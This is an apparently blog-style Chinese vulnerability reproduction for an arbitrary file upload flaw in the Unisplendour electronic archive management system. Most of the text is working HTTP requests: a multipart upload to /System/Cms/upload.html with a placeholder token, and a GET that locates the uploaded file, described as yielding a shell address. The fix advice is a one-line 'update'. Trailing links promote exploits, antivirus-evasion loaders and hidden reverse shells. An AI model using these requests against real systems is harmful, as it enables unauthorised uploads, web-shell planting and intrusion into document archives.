0x01 前言

0x02 影响平台

紫光电子档案管理系统

0x03 漏洞复现

POST /System/Cms/upload.html?token= HTTP/1.1Host: ip:portUser-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36Connection: closeContent-Length: 544Accept: application/json, text/javascript, */*; q=0.01Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7,zh-TW;q=0.6Content-Type: multipart/form-data; boundary=----WebKitFormBoundary3enKbCUwg60aGZcr
------WebKitFormBoundary3enKbCUwg60aGZcrContent-Disposition: form-data; name="userID"
admin------WebKitFormBoundary3enKbCUwg60aGZcrContent-Disposition: form-data; name="fondsid"
1------WebKitFormBoundary3enKbCUwg60aGZcrContent-Disposition: form-data; name="comid"
1------WebKitFormBoundary3enKbCUwg60aGZcrContent-Disposition: form-data; name="token"
1------WebKitFormBoundary3enKbCUwg60aGZcrContent-Disposition: form-data; name="files[]"; filename="11.txt"
12345ewq------WebKitFormBoundary3enKbCUwg60aGZcr--

GET /uploads/company1/fonds1/cms/20230914/UNIS-STSivEtrODyRfIA6JpxQDoBlO.txt HTTP/1.1Host: ip:portUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36Accept: */*Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Cookie: PHPSESSID=c9e1867ad3766cf83d294ff7f74663f8Connection: close
将响应包地址拼接即可得到shell地址。

http://ip:port/uploads/company1/fonds1/cms/20230914/UNIS-STSivEtrODyRfIA6JpxQDoBlO.txt

0x04 参考来源

https://mp.weixin.qq.com/s/YAVLMwMG1IusJ1kUCXwl1w

0x05 修复方案

建议及时更新至最新版本！

1. ☆☆☆☆☆ | CVE-2023-33246 RCE漏洞（附EXP）

2. ☆☆☆☆☆ | 横向移动与域控权限维持方法总汇

3. ☆☆☆☆☆ | Apache HTTPd最新RCE漏洞复现
   

4. ☆☆☆☆☆ | CNVD-2023-34111 RCE漏洞（附EXP）
   

5. ☆☆☆☆☆ | Cobalt Strike免杀脚本生成器|cna脚本|bypassAV

6. ☆☆☆☆☆ | MySQL数据库利用姿势

7. ☆☆☆☆☆ | phpMyAdmin漏洞利用汇总

8. ☆☆☆☆☆ | 泛微E-Mobile任意文件上传漏洞（附EXP）

9. ☆☆☆☆☆ | 小技巧~用一条命令来隐藏反向Shell

10. ☆☆☆☆☆ | New免杀ShellCode加载器（附下载）

11. ☆☆☆☆☆ | 红队攻防 | 解决HW被疯狂封IP姿势～（附下载）